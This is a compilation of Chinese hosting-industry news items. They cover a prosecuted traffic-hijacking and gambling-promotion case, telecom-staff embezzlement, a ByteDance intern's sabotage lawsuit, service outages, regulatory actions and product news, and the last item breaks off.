打工期间,张某偶然发现,有用户输入他所工作的赌场网址,却总是跳转到其他赌博网站。 经打听,张某了解到这种情形被称为“流量劫持”,境外黑灰网站的经营者(广告主)想增加 UV(访客量),就找到具有技术、设备和网络资源的人(流量主),由流量主通过部署相关设备和软件,使网络用户在访问特定网站时,被强制跳转到广告主推广的网站页面,从而达到流量劫持的目的。 而链接流量主和广告主的人被称为“网络黄牛”,通过赚取广告主付费与流量主报价之间的差价获利。 张某认为自己找到了“生财之道”,回国后四处打听流量劫持的渠道。 2019 年,时任资阳市某运营商销售总监的涂某为招揽公司 IDC(网络资源外包)业务,在网上加入了几十个行业 QQ 群寻找需求客户。 张某通过 QQ 群添加涂某好友后,直截了当地询问涂某能否提供有偿的流量劫持服务。 虽然涂某十分清楚,这既不符合公司规定,也不符合法律规定,但在利益的诱惑下,两人还是一拍即合。 随后,涂某以测试网络质量为由,安排机房工作人员将张某购买的服务器安装于资阳市某运营商的机房,张某把该服务器的远程登录操作权限交给了上游广告主。 2019 年 4 月、10 月,他们开展了两次流量劫持操作,但因使用该运营商网络的用户较少,加之“测试”工作只能开展三五天时间,时限一到服务器就会被机房断电断网,导致通过该服务器的网络流量过小,最终未继续实施流量劫持。 不过,张某还是“豪爽”地先后付给涂某共计 1.58 万元作为报酬,希望借此打通省级运营商关系,省去中间商环节。 而张某通过此次试水,也自诩摸清了这行轻松来钱的“门路”。 结束与涂某的合作后,张某继续沿用“成功经验”寻找流量主。 2020 年 4 月,他结识了谢某。 谢某拥有 4 家公司,其中 2 家公司主营与通信行业相关业务,有技术、有流量、有人脉、有经验的谢某,无疑是张某的最佳合作伙伴。 “早在张某之前,我就为非法赌博网站提供过流量劫持服务。”到案后,谢某交代,为了安全起见,双方商定只干“黑吃黑”的活,即不碰国内正规网站流量,仅劫持同类非法网站流量,谢某通过配置软件,可以将所有经手流量访问的网站与前期收集的几十万个同类非法网站名单进行对比,只有当用户访问同类非法网站时才进行流量劫持。 张某遇到谢某时,谢某已经是具有流量劫持全套技术的资深人士,且为张某准备了一套成熟的“局”。 为了提高用户访问量,谢某找到朋友张某乙。 张某乙在上海拥有一家网络科技公司,并在杭州、南昌、武汉、西安、兰州等地拥有机房,对外开展 IDC 业务,拥有大量网络流量。 谢某将用于流量劫持的服务器邮寄给张某乙,由其安排技术人员进行部署。 谢某交代,由于黑灰网站用户注册量返点费用高于访问量返点费,为了显得流量更有价值,其还在 KTV 找了一些服务人员,给每人几百元钱,确保每天有人通过他的流量登录广告主推广的赌博网站充值消费。 2020 年 9 月,谢某因另案涉嫌帮助信息网络犯罪活动罪被黑龙江省牡丹江市公安局取保候审;同年 11 月,因涉嫌帮助信息网络犯罪活动罪又被福建省晋江市公安局取保候审。 谢某嗅到了危险的信号,2021 年初把架设在各地做流量劫持服务器的远程管理权全部打包给了朋友高某,由高某接手与各方对接打理,谢某退隐后台,只从高某处领取分红。 高某作为资深的广告从业者有着更广的人脉渠道,全国多地运营商的流量资源从各色人手中通过高某向张某聚来。 直至 2022 年 6 月张某案发被捕,张某向高某支付的推广费用折合高达 1600 余万元,张某通过抽取中间费借此敛财折合 400 余万元。= 法网恢恢,疏而不漏。 2022 年 6 月,张某因涉案被公安机关刑拘,这场“流量狂欢”终告结束。紧接着,他的合作方也陆续到案。 罚当其罪,坚持罪责刑相适 检察官邀请运营商专家、网络安全专家、检察技术人员进行技术讨论。 2022 年 9 月 1 日,应公安机关邀请,绵竹市检察院依法介入。“案件涉及专业的计算机技术和复杂的网络架构,如网络流量是如何控制的、犯罪嫌疑人如何通过流量来获取非法利益、涉案人员的交易金额如何认定等,为此,市检察院针对该案成立办案组,由检察技术人员协助检察官依法同步介入引导侦查,重点围绕电子数据技术解读、引导公安机关补充固定关键性电子数据证据、通过人工智能大模型协助分析审查海量电子数据等提供技术支持。”绵竹市检察院承办检察官何静告诉记者。 通过梳理张某的供述,检察官发现与他合作的流量主包括涂某、谢某、高某、梁某等人。为此,检察机关建议公安机关加派人手“兵分多路”进行侦查。谢某被抓后,其同伙迅速安排人员将用于流量劫持的服务器断电下架,清除了服务器中的关键电子数据。 检察官召开案件讨论会。 办案人员在运营商机房实地查看服务器端口镜像连接。 在此情况下,检警多次召开联席会议,就案件技术问题咨询运营商专家,赴谢某公司所在地对流量劫持过程进行现场侦查实验。 “新型计算机网络犯罪中电子数据灭失无法恢复、犯罪嫌疑人技术性辩解,都可能成为影响定罪量刑的关键因素。”何静表示,侦查实验还原了谢某的行为可以成功使用户访问的域名跳转至目标网站域名,虽然关键数据被故意抹去,但其劫持原理、过程的稳定供述,侦查实验、劫持引流的客观查询数据,可以综合认定谢某违反国家规定,对计算机信息系统实施了非法控制。 2022 年 9 月,在审查逮捕期间,张某辩称自己只是广告主与流量主之间的中间商,没有实际参与流量劫持,不构成非法控制计算机信息系统罪的共犯,应以帮助信息网络犯罪活动罪定罪。 针对其辩解,办案组在检察技术人员辅助下,调取整理张某常用的 11 个账号 239 万余条聊天记录,发现张某不仅作为中间商参与信息网络犯罪,还事先与流量主商讨流量劫持目标,并在整个流量劫持过程中提供技术支持、问题反馈及劫持优化。 “张某在明知谢某、高某以流量劫持的方式为其推广非法网站,发送被劫持和被推广的域名,参与到流量劫持中,其行为违反国家法律规定,系采用其他技术手段获取计算机信息系统中存储、处理或者传输的数据,对计算机信息系统实施非法控制的共同犯罪。”检察官分析认为。 针对张某违法所得的认定问题,考虑到张某与上游广告主之间结算均使用虚拟货币,张某的虚拟货币钱包交易情况复杂,无法准确锁定广告主转账主体等特殊情况,办案组建议公安机关通过下级流量主收到的费用倒推出张某收到的推广费用,最终确定 2019 年 4 月至 2022 年 6 月期间张某伙同他人共收取推广费用 2500 余万元,张某非法获利 500 余万元。 一系列客观证据与主观证据形成证据锁链。 2023 年 1 月,公安机关将张某移送绵竹市检察院审查起诉。 绵竹市检察院经审查认为,张某伙同他人使用非法控制计算机信息系统的技术手段,推广赌博、色情网站的行为,既触犯帮助信息网络犯罪活动罪,也触犯非法控制计算机信息系统罪,应择一重处,于 2023 年 6 月对其以涉嫌非法控制计算机信息系统罪向法院提起公诉。 2024 年 1 月,张某因犯非法控制计算机信息系统罪被判处有期徒刑四年,并处罚金 50 万元。 4月,绵竹市检察院以涂某、谢某等 5 人涉嫌非法控制计算机信息系统罪依法提起公诉。 6 月,涂某等 2 人被判处有期徒刑一年至三年,缓刑一年至四年,各并处罚金 3000 元至 3 万元。谢某、高某等 3 人案已于 10 月 24 日开庭审理。 “流量劫持涉案人员多,地域覆盖广,可能存在漏犯线索,但大量犯罪案件线索散布于各犯罪嫌疑人的各种联络中,线索之间又存在交叉。”办案组在案件办理中提出,“该案的办理应拔出萝卜带出泥,要把吸附在通信机房里的‘水蛭’、深藏在运营商队伍中的‘内鬼’、破坏国内网络安全生态的‘污染源’彻底揪出来、清理掉。”绵竹市检察院针对张某通话记录、短信内容、网站访问记录等进行汇总分析,梳理出跨越北京、广东、四川、陕西四地的10余条犯罪线索,形成犯罪网络关系图,向公安机关提出关联犯罪一查到底的意见,彻底斩断黑灰网络产业链。 据记者了解,截至目前,当地公安机关已对张某乙等 5 人侦查终结并移送绵竹市检察院审查起诉。 #### 因用户暴增引发服务超负荷,向日葵远程挂了 之前主机吧推荐过的远程控制软件向日葵今天挂了,并且#向日葵远程#登上微博热搜榜。 点击进入后,原来是向日葵远程崩了。上午 11:05 分@向日葵远程控制 官方发布微博称:由于大量用户涌入,导致服务器繁忙,目前已在紧急恢复中,请将向日葵保持登录状态,恢复后请重试连接即可。14:19 分官方微博更新称:对于此次用户暴增引发的服务超负荷,主要由两个原因导致。1)5月5日是五一小长假结束后的首个工作日,出现高峰登陆。2)多地因疫情影响开始施行居家办公,远控需求激增,其中北京、上海、郑州、无锡、广州等地均出现超10倍的用户增长。目前技术团队的修复进展如下: 9点30发现问题,开始做服务器扩容;10点发现用户还在不断新增,加快服务器扩容速度,由于扩容速度过快,导致阿里云的负载均衡服务出现短时故障;截止到11:00已经恢复50%的请求;截止到13:00已经恢复60%的请求;截止到13:30已经恢复75%的请求。 16:50 官方微博称:今日因服务器超负荷引起的无法正常登陆问题,已经于15:20分修复完毕,目前所有用户已恢复正常登陆。为表达歉意,对于此次受影响的用户,我们准备了如下补偿方案: 1)向日葵免费用户:赠送7天精英版服务 2)向日葵付费用户:免费延长30天相应服务 #### 因电信诈骗问题阿里云、百度云被两部门约谈 11月24日消息:据 @工信微报 消息,工业和信息化部网络安全管理局、公安部刑事侦查局近日联合约谈阿里云、百度云两家企业相关负责人,通报了近期两家企业在防范治理电信网络诈骗工作中存在的接入涉诈网站数量居高不下等问题。 工信部、公安部要求两家企业切实履行网络与信息安全主体责任,严格落实《网络安全法》等法律法规要求,对相关问题限期予以整改;拒不整改或整改不到位的,将依法依规从严惩处。两家企业表示将认真落实监管要求,进一步加强网站接入、域名注册、信息服务等管理,切实防范化解电信网络诈骗风险。 下一步,工业和信息化部将会同公安部坚持以人民为中心的发展思想,聚焦广大人民群众反映的难点痛点问题,出实招、下重拳,指导督促互联网企业严格落实安全责任,强化互联网基础资源管理和涉诈互联网账号监测处置,加大行业监督及违规处罚力度,多措并举全力推进互联网领域的电信网络诈骗防范治理工作,更好维护人民群众财产安全与合法权益。 #### 因私开 机房大带宽业务,6 人被判:犯职务侵占罪、违法所得 603 万元 向某某,男,1980年出生,大学文化,经商喻某某,男,1982年出生,大专文化,经商陈某某,男,1983年出生,大学文化,务工陈某2,女,1974年出生,大专文化,务工钟某,男,1981年出生,大学文化,务工刘某,男,1977年出生,大学文化,务工 一审查明事实钟某、刘某、陈某2均系中国电信股份有限公司株洲分公司(以下简称“电信公司株洲分公司”)的员工,三人负责公司的IDC业务。钟某的工作职责是负责IDC业务的接通和维护等。刘某的工作职责是负责机房中IDC业务客户服务器的规划、放置、服务器网络故障维修等。陈某2的工作职责是负责IDC客户的业务受理、签约及IDC客户业务流量分析与收入预测等。陈某某系中国电信股份有限公司湖南分公司(以下简称“湖南省电信公司”)的员工,工作职责是负责信息安全、IDC业务的开通以及IDC业务端口的稽查等。2016年年底至2020年2月期间,钟某伙同刘某、陈某某、陈某2未经电信公司株洲分公司及湖南省电信公司的同意,为喻某某、向某某私开大带宽的IDC业务。 具体犯罪事实如下: 12016年年底,喻某某在明知钟某没有开通大带宽IDC业务权限的情况下,接受钟某为其私开大带宽IDC业务端口,因陈某某负责IDC业务的开通及端口稽查、陈某2负责IDC业务的受理及流量数据分析,其二人害怕私开端口被公司发现,故找到陈某某、陈某2,让其二人一起加入,陈某某、陈某2表示同意,具体分工为钟某利用其2016年之前在负责此项工作中掌握的未被湖南省电信公司更改的交换机管理密码开通端口,陈某某负责在湖南省电信公司对端口进行巡查时提前告知钟某,不向领导报告钟某私开端口的行为,陈某2为钟某隐瞒其私开端口的行为。因刘某经常出入机房,钟某怕刘某发现其私开端口,2018年5月,钟某主动告诉刘某其帮喻某某私开了端口,并且表示分给刘某好处,并让刘某不要举报其私开端口的行为,刘某表示同意。 2016年年底至2019年1月,喻某某通过钟某等人为其私开端口共获利5137300元,刘某加入以后,2018年5月至2019年1月期间,喻某某等人通过私开端口获利2852900元,其中钟某分得1998000元,陈某某分得1641000元,陈某2分得1170000元,刘某分得161000元。 22019年3月底,向某某找到钟某、刘某,在明知钟某没有开通大带宽IDC业务权限的情况下,让二人为其私开大带宽IDC业务端口,钟某、刘某表示同意,具体分工为钟某负责用其在IDC业务维护工作中获知的管理密码现场开通端口,刘某负责安排向某某的服务器放入电信公司株洲分公司的机房,向某某负责在外承接IDC业务。2019年10月,陈某某加入,负责在湖南省电信公司对端口进行巡查时提前告知钟某,不向领导报告钟某私开端口的行为。2019年3月至2020年2月,向某某通过钟某等人为其私开端口共获利893715.63元,西安某公司另尚有219545元未支付给向某某,陈某某加入以后,2019年10月至2020年2月期间,向某某等人通过私开端口获利613752.17元,其中钟某分得426001元,刘某分得288091元,陈某某分得160105元。 另查明:钟某涉案金额为6250560.63元,违法所得为2424001元;向某某涉案金额为1113260.63元,违法所得为19518.63元;喻某某涉案金额为5137300元,违法所得为167300元;陈某某涉案金额为5751052.17元,违法所得为1801105元;刘某涉案金额为3966160.63元,违法所得为449091元;陈某2涉案金额为5137300元,违法所得为1170000元。钟某被侦查机关抓获归案后如实供述了其所犯罪行,并协助侦查机关抓捕向某某,且自愿认罪认罚,已退赔被害单位830000元。向某某系被侦查机关抓获归案,已退赔被害单位19520元,并获得了被害单位的谅解,但庭审中未能如实供述其所犯罪行。喻某某系侦查机关电话通知后主动投案,归案后如实供述了其所犯罪行,已退70万元由侦查机关扣押在案,获得了被害单位的谅解,且自愿认罪认罚。陈某某系侦查机关电话通知后主动投案,归案后如实供述了其所犯罪行,已退赔被害单位181万元并获得了谅解,且自愿认罪认罚。刘某系侦查机关电话通知后主动投案,归案后如实供述了其所犯罪行,已退赔被害单位778500元并获得了谅解,且自愿认罪认罚。陈某2系侦查机关电话通知后主动投案,归案后如实供述了其所犯罪行,已退赔被害单位117万元并获得了谅解,且自愿认罪认罚。案发后,西安某公司直接向被害单位支付了40万元,用于清偿涉案219545元。 法院裁定:喻某某、向某某伙同钟某、刘某、陈某某、陈某2并利用钟某、刘某、陈某某、陈某2的职务之便,将被害单位电信公司株洲分公司的财物非法占为己有,数额巨大,其行为均已构成职务侵占罪。根据从旧兼从轻的刑法原则,对各被告人均依法适用《中华人民共和国刑法修正案(十一)》第二十九条之规定。钟某、喻某某、陈某某、刘某、陈某2共同故意实施第一起犯罪事实,是共同犯罪,钟某、喻某某起主要作用,系主犯,应当按照其所组织的、参与的全部犯罪处罚。陈某某、刘某、陈某2起次要作用,系从犯,依法从轻处罚。钟某、向某某、刘某、陈某某共同故意实施第二起犯罪事实,是共同犯罪,钟某、向某某、刘某起主要作用,系主犯,应当按照其所组织的、参与的全部犯罪处罚。陈某某起次要作用,系从犯,依法从轻处罚。钟某归案后协助侦查机关抓捕向某某,有立功表现,依法从轻处罚。钟某被抓获归案后能如实供述自己所犯罪行,是坦白,依法从轻处罚。喻某某、陈某某、刘某、陈某2经侦查机关电话通知后主动投案并如实供述其所犯罪行,是自首,均依法减轻处罚。钟某、喻某某、陈某某、刘某、陈某2均自愿认罪认罚,均依法从宽处理。钟某部分退赔被害单位,可酌情从轻处罚。向某某、喻某某、陈某某、刘某、陈某2均退赔了被害单位损失并取得其谅解,可酌情从轻处罚。据此,判决如下:一、钟某犯职务侵占罪,判处有期徒刑三年六个月,并处罚金六万五千元;二、向某某犯职务侵占罪,判处有期徒刑三年,并处罚金六万元;三、喻某某犯职务侵占罪,判处有期徒刑二年四个月,并处罚金五万元;四、陈某某犯职务侵占罪,判处有期徒刑二年,并处罚金四万元;五、刘某犯职务侵占罪,判处有期徒刑一年十个月,并处罚金三万五千元;六、陈某2犯职务侵占罪,判处有期徒刑一年七个月,并处罚金三万元;七、对钟某的违法所得2424001元(已退缴830000元)、向某某的违法所得19518.63元(已全部退缴)、喻某某的违法所得167300元(已全部退缴)、陈某某的违法所得1801105元(已全部退缴)、刘某的违法所得449091元(已全部退缴)、陈某2的违法所得1170000元(已全部退缴)予以追缴,退赔被害单位中国电信股份有限公司株洲分公司。 二审:驳回上诉,维持原判。  #### 因站长薅羊毛,51.la“优站计划”宣布停运 10月21日 消息:近日,免费流量统计技术服务提供商51.la宣布,因发现活动存在恶意传播和大量违规作弊行为,决定对“优站计划”活动运营策略进行调整。 具体为: 2022年10月20日18时起,暂停活动资格新申请,已申请通过的用户,可继续在活动终止前获得收益。2022年12月31日0时起,“优站计划”活动将停止运营,并关闭和下线有关该活动的所有入口和关联活动。活动停止运营后,将无法继续获得激励收益。 51.la表示,截至2022年12月31日0时,如账户内积分未达到最低100元提现标准时,剩余余额继续保留,可参与其他活动(邀新或其他新推出的活动)继续获取收益。将开放额外的兑换通道,在活动终止后可将活动获取的余额收益可兑换统计增值服务。 据了解,“优站计划”是51LA在今年2月推出的二十周年感恩回馈活动。成功加入计划的站长可以获取一定的收益奖励。包括:新功能、新产品优先使用资格、优质站长联盟资源互助、专属VIP客服服务等等。 以下为51.la公告全文: 各位尊敬的“优站计划”活动参加者: 感谢您一直以来对有啦流量分析系统的支持! 我们举办“优站计划”活动的初心,是扶持认真耕耘网站内容的站长,为共同建设良好的互联网网站运营环境做贡献。活动开始至今,有超过1万名站长参与。承蒙站长们的关注和支持,在活动的运营上,我们努力追求公平、客观,及时发放奖励。 但近期,我们发现活动存在恶意传播和大量违规作弊行为(虚假网站或伪造流量等),该类行为非法获取积分,严重打破了活动的公平性,也违背了51LA“优站计划”的初心。因此,我们决定对“优站计划”活动运营策略进行调整: 2022年10月20日18时起,暂停活动资格新申请,已申请通过的用户,可继续在活动终止前获得收益。 2022年12月31日0时起,“优站计划”活动将停止运营,并关闭和下线有关该活动的所有入口和关联活动。活动停止运营后,将无法继续获得激励收益。 注:活动停止运营后,账户内收益余额将会保留,您可继续通过其他活动获取收益或用于购买其他增值服务。 为答谢一直以来支持该活动的广大站长,我们还推出了相应的终止活动的方案,方案内容如下: 截至2022年12月31日0时,如您账户内积分未达到最低100元提现标准时,剩余余额继续保留,可参与其他活动(邀新或其他新推出的活动)继续获取收益。 我们将为您开放额外的兑换通道,在活动终止后可将活动获取的余额收益可兑换统计增值服务。 以上所述,还请您理解并相互转告,如有任何疑义,请随时与官网客服联系。 这是我们第一次也是全网第一个推出面向站长的现金激励活动,我们对活动提前终止运营深感遗憾,再次向各位站长致歉!我们十分感谢各位的理解和原谅,也衷心期待各位继续支持和关注有啦旗下更多优秀产品! 51.LA官方活动运营团队 2022年10月20日 #### 因篡改字节跳动 AI大模型代码不承认 被起诉并索赔 800 万元 11 月 27 日消息,据《南方都市报》今晚报道,字节跳动起诉前实习生田某某篡改代码攻击公司内部模型训练一案,已获北京市海淀区人民法院正式受理。字节跳动请求法院判令田某某赔偿公司侵权损失 800 万元及合理支出 2 万元,并公开赔礼道歉。 报道称,田某某本科毕业于北京航空航天大学软件学院,研究生就读于北京大学,研究兴趣为深度学习的优化与算法。字节跳动内部人士表示,之所以此时发起诉讼,是由于田某某为在读博士,公司将其辞退后首先交由校方处理。但在事件处理期间,田某某多次对外否认,称攻击模型训练任务的不是自己,而是别的实习生。考虑到田某某完全没有意识到错误,且涉事行为已触犯公司安全红线,公司最终决定向法院起诉,以表明公司严肃态度、杜绝类似事件再次发生。 今年 10 月,业界消息称,“某头部大厂的大模型训练被实习生入侵,注入了破坏代码,导致其训练成果不可靠,可能需要重新训练。据称遭到入侵的代码注入了 8000 多张卡,带来的损失可能超过千万美元。”知情人士表示该公司为字节跳动。 根据传闻,某高校的博士在字节跳动商业化技术团队实习,因对团队资源分配不满,使用攻击代码破坏团队的模型训练任务。该田姓实习生利用了 HF 的漏洞,在公司的共享模型里写入破坏代码,导致模型的训练效果忽高忽低,无法产生预期的训练效果,而且 AML 团队无法核查原因。但传闻曝出之后,该实习生还在某微信群里辟谣称,自己发完论文后就从字节跳动离职,这个当口有另一个人钻漏洞改模型代码,把锅扣到自己头上。 字节跳动后续发布《关于“实习生破坏大模型训练”的事实澄清》:近期有媒体称“字节跳动大模型训练被实习生攻击”,经公司内部核实,确有商业化技术团队实习生发生严重违纪行为,该实习生已被辞退。 涉事实习生恶意干扰商业化技术团队研究项目的模型训练任务,但并不影响商业化的正式项目及线上业务,也不涉及字节跳动大模型等其他业务。 网传“涉及 8000 多卡、损失上千万美元”严重夸大。 经核实,涉事人一直在商业化技术团队实习,并没有 AI Lab 实习经历。其社交媒体个人简介及部分媒体报道有误。 #### 因网站被篡改非法内容 网警要检查整改 最近,有位客户的企业网站被黑客入侵,并修改了非法内容,而且该客户一直不知道,直到网警上门通知才知道自己网站被非法入侵了。 目前网警已要求客户整改非法内容,同时网站必须安装防火墙。 于是客户就联系上了主机帮看如何处理,主机吧在咨询了下客户的网站环境后,发现该客户使用的是windows,服务器类的防火墙较少,可以安装安全狗这类的防火墙,同时推荐使用云WAF进行安全防护,可对网站部署百度云防护安全防护。 百度云防护集成了WAF、DDoS、CC防护能力,并包含CDN流量。可同时满足您的CDN 加速和综合安全防护需求。 百度云防护可以同时防护包括SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等问题在内的十多种黑客渗透攻击和SYN Flood、UDP Flood、ICMP Flood、TCP Flood以及CC在内的多种DDoS攻击。 客户部署成功后,网警检测后,没问题就通过整改了,这事也给我们提个醒,网站安全问题很重要,现在黑客太多,而且网站漏洞防不胜防,平时一定要做好安全防御。   #### 因网站采集他人原创文章被告了 最近主机吧发现很多站长被告了,原因都是侵权,最近站长论坛上又有一位站长被告了,对方索赔金额是10000元,目前还在法院调解阶段。 原因站长网站发布的文章是来源于某自媒体账号的所谓原创内容,属于未经授权,这才被侵权了,索赔要1万元,这篇文章被百度收录了,有35个阅读量。 说实话这个赔偿有点贵,一篇文章1万元不大可能,即使法院判下来了,也不会支持1万一篇文章这么离谱,不过赔偿是肯定了。 所以,各位站长,平时别乱转载别人文章了哈,现在公司都是故意让你转的,然后通过侵权赔偿来赚钱,文章本身不值钱,侵权值钱,大家要引以为戒,以免造成经济损失。 #### 因美国阻挠,香港直联美国海底光缆项目搁浅 2016 年Google、Facebook 及中国第4 大电讯商鹏博士电讯传媒集团合作,计划建设跨太平洋海底光缆,最初原定连到香港,却因监管争议而延宕。近日美国联邦通讯委员会(Federal Communications Commission,FCC)批准Google 使用跨太平洋海底光纤网(Pacific Light Cable Network,PLCN),但有消息指美国对中国有疑虑,所以条件是需将香港排除在外。 美国联邦通讯委员会批准Google 使用跨太平洋海底光纤网连接加州和台湾的部分 美国司法部认为,许可美国和香港直接连通光缆存在重大风险 有分析认为,美方这项决定,恐终结香港的美国网路电缆连接首选地位 据外国媒体报道,Google 及Facebook 上周向美国政府申请重启美国到菲律宾、台湾的海底电缆,意味已放弃连接到中国和香港部分。最后FCC 准许Google 母公司Alphabet,启用该公司长达8000英里(约1.29 万公里)的太平洋光缆网络(Pacific Light Cable Network)中,连接加州和台湾的部分。 美国司法部周三(8日)表示,许可美国和香港直接连通光缆存在重大风险,有可能严重危害美国国家安全和执法利益。美国司法部认为鹏博士与华为有千丝万缕的关系,电缆直接连到香港,容易受到中方控制。这决定获美国国土安全部及国防部的支持。 Google 发言人表示,该公司欢迎美方决定,将致力于提升服务能力。有分析认为,美方这项决定,恐终结香港的美国网路电缆连接首选地位,Facebook 出资连接洛杉矶与香港的光纤电缆、Google 出资连接香港与美国领地关岛的电缆计划也可能出现变   鹏博士集团在中国提供通信服务。合作伙伴包括电信设备制造商华为技术有限公司。《华尔街日报》援引参与相关讨论的人士的话说,司法部表示反对,因为对中国投资方、总部位于北京的鹏博士集团“感到担心”。 中美大陆之间已有多条光缆。过去,只要负责光缆项目的美方公司采取措施防止海外政府封锁或利用流量,美国司法部领导的“电信小组”都会批准此类项目,包括直接连结美国和中国大陆的光缆项目,或者涉及中国国有电信运营商的项目。这将是美国首次以“国家安全”为由拒绝发放海底光缆许可证,这可能意味着监管机构对中国项目采取了更强硬的新立场。 对于站长来说,这条光缆其实很重的,香港直联美国光缆一但启动,国内访问美国服务器速度将会得到一个质的飞跃,对于那些使用美国服务器的网站来说,将是一个好消息,因为国内访问速度变快了,可惜,估计会被搁浅了……   #### 因遭大规模网络攻击而关闭的《鹅鸭杀》服务器重新上线了 1 月 12 日消息游戏,《鹅鸭杀》服务器日前遭遇大规模网络攻击,官方被迫停服维护。今天,官方宣布服务器已经重新启动。 官方表示,服务器已经启动,将以涓涓细流的方式开始,因为服务器正在苏醒中。 据了解到,这款英文名为《Goose_Goose_Duck》的狼人杀小游戏近期爆火,曾连续三天 Steam 在线人数超过 60 万。 游戏介绍: 《鹅鸭杀》是一款团队合作类游戏,于 2021 年 10 月在 Steam 平台免费发行,目前口碑依然为特别好评。你和你的鹅伙伴必须一起完成任务。注意那些不怀好意的恶霸和其他鸟类,它们已经渗透到你的团队中,并会从中阻挠你们的任务。 Steam 链接:点此前往 #### 因郑州暴雨导致景安机房断电 最近郑州遭遇特大暴雨袭击,导致全城断电,看新闻挺多人遇难的,对此我们只能为郑州祈福,希望洪水尽快结束,对互联网界来说影响也是非常巨大的。 比如郑州的数据中心一直是国内互联网重要的枢纽,这次洪水不仅断电影响数据中心的服务器正常运行,甚至可能洪水会进入数据中心。 郑州知名IDC服务商景安网络,目前就发了公告: 景安的数据中心国内很多公司都与他们合作,直接就导致了很多公司连夜更换数据中心,有些来不及备份的,直接就打不开了。 如果你的资料刚好在郑州的,建议做好异地备份,以免造成严重损失,这里就体现了异地备份的重要性了。 #### 因采集翻译文章含违禁词被关站 这两年做网站流行一种套路,就是用翻译软件翻译外网的文章,然后在国内发布。 这样做的好处是,百度会认为你的网站内容都是原创的,而且质量高。 很多采集站都用这招,大量翻译国外知名网站的文章,转到国内用中文发布,排名都非常好。 但是这里也有雷区,因为很多外网的文章内容不受控制,含有一些国内禁止的内容,一但被监管部门查到,很容易被迫关站,今天主机吧就遇到了一位站长,因为违禁词被迫关站了。 所以,大家在发布文章的时候一定要小心啦,有些内容不是复制粘贴过来就可以用的。 #### 国产显卡摩尔线程 MTT S30首次成功中标某大型国有银行台式电脑采购项目 2 月 1 日消息,据国产显卡厂商摩尔线程官方消息,近期,摩尔线程联手紫光,斩获某大型国有银行全行台式电脑采购项目订单。 据介绍,本次中标的电脑机型为紫光 UNIS D3812 G2 终端,搭载了摩尔线程多功能桌面级显卡 MTT S30,整机国产化率超过 85%。 ▲ 紫光 UNIS D3812 G2 终端 摩尔线程首次放出了 MTT S30 的外观图,基于 MUSA 统一系统架构打造,支持 OpenGL、OpenGL ES 及 Vulkan 等多种图形 API,可以加速基于 WebGL 的在线 3D 内容实时渲染、4K 视频播放、视频会议、Office 办公软件,以及基于 AI 的 OCR 识别等多种复杂应用和使用场景。 ▲ 摩尔线程 MTT S30 此外,MTT S30 兼容 X86、ARM、LoongArch 等国内外主流 CPU 架构,支持 Windows、国产 Linux 操作系统及常见 Linux 发行版。 #### 国产良心办公软件WPS关闭第三方商业广告 根据最新的消息,WPS Office国内个人版已于2023年12月20日正式关闭第三方商业广告45。这意味着用户在更新到最新版本的WPS后,将能享受到更加清爽、简洁的办公体验。 WPS在公告中表示,他们一直在减少广告,并在去年下定决心在2023年底正式关闭第三方商业广告。尽管广告曾经是WPS的一项重要营收来源,但公司认为提供优质的产品服务体验更为重要。因此,他们决定关闭第三方广告,以便更专注于技术研发,从而提升用户体验。 此外,对于不想更新的个人免费版用户,也可以通过手动操作来关闭第三方广告。方法是在配置工具里找到“WPS Office”的设置,进入“配置工具”,切换到“其它选项”,关闭掉“WPS 热点及广告推送”的勾选即可。 总的来说,WPS关闭第三方商业广告是为了给用户带来更好的使用体验,同时也体现了WPS对用户体验的重视和对自身产品的信心。 #### 国产芯片公司华夏芯倒闭了 包括域名在内的资产被拍 据全国企业破产重整案件信息网发布,华夏芯(北京)通用处理器技术有限公司(简称:华夏芯)管理人将于2024年9月22日10时至09月23日10时止(延时除外)公开拍卖域名及15项软件著作权、14项专利。公告显示,拍卖标的包括域名3项,起拍价13879元;15项软件著作权、14项专利起拍价15550元。本次拍卖系管理人参照《北京市高级人民法院关于破产程序中财产网络拍卖的实施办法(修订)》的相关规定,华夏芯(北京)通用处理器技术有限公司财产的处置行为,本拍卖公告未尽事宜,按照前述法律、实施办法的相关规定执行。 今年4月有报道称,北京市第一中级人民法院裁定受理西安九步坊企业管理合伙企业(有限合伙)对华夏芯申请破产清算一案。天眼查显示,华夏芯存在多条自身风险,包括失信被执行人、限制消费令、被执行人、股权冻结、破产案件等多种类型。 主机帮查了下,该公司官网还处在正常打开状态,域名为hxgpt.com,也被拍卖,这域名本身不值钱,花一万多块买这个域名还是很划算的,毕竟这个域名本身还有些流量的,拿去做IT网站的话,应该可以省不少事。 #### 国内2020年开源语言排行榜:Java稳居第一 PHP排名第三 易语言增涨最快 1月20日 消息:今日,代码托管服务码云Gitee发布了2020年的开源年报,报告显示,Java 稳居语言占比第一,小众语言增速迅猛。 虽然占比较去年(50%)有不小的下跌, 但 Java 依旧是使用最多的语言(38%),前五名的语言较去年变化较小,PHP 超越 Python 成为了第三位。、 此外,报告显示,Rust 和 Dart 连续2年保持高速增长。而易语言虽登顶增速榜,但其总量与其他语言相比仍非常稀少,与主流编程语言仍有较大的距离。 点击查看:《2020年Gitee 开源年报》 #### 国内CDN支持端口转发吗 最近主机吧有收到客户提到这个问题:国内CDN支持端口转发吗? 今天我们来说说CDN支不支持转发自义端口。 答案是支持的,但不是所有CDN都支持,普通CDN只支持标准网页端口80、443端口,比如百度云加速就只支持80和443端口,不支持自义端口,所以在购买CDN的时候一定要咨询清楚,一般没写自义端口功能的CDN都是不支持的。 目前主机吧这边的高防CDN中,就京东云星盾支持,不过支持自义端口的套餐价格也是相当昂贵的。 如有需要自义端口防御的,主机吧建议使用高防IP进行转发防御,高防IP支持多个端口转发防御,价格还便宜。 防御值:100G 宽 带:50Mbps 防护域名数:2 业务QPS:10,000 防护端口数:5 月付:594元 有需要的同学连续主机吧。 #### 国内chatgpt同类产品:百度文心一言 文心一言是百度全新一代知识增强大语言模型,文心大模型家族的新成员,能够与人对话互动,回答问题,协助创作,高效便捷地帮助人们获取信息、知识和灵感。文心一言是知识增强的大语言模型,基于飞桨深度学习平台和文心知识增强大模型,持续从海量数据和大规模知识中融合学习具备知识增强、检索增强和对话增强的技术特色。 2023年3月20日,百度官微消息文心一言云服务将于3月27日上线,是国内上线最早的chatgpt同类产品。 官网地址:https://yiyan.baidu.com/ #### 国内两家省级医院服务器疑遭勒索病毒攻击:竟要求支付比特币 2 月 24 日消息 勒索病毒活动传播方式花样百出,没有做好防御工作的话,极其容易中招。 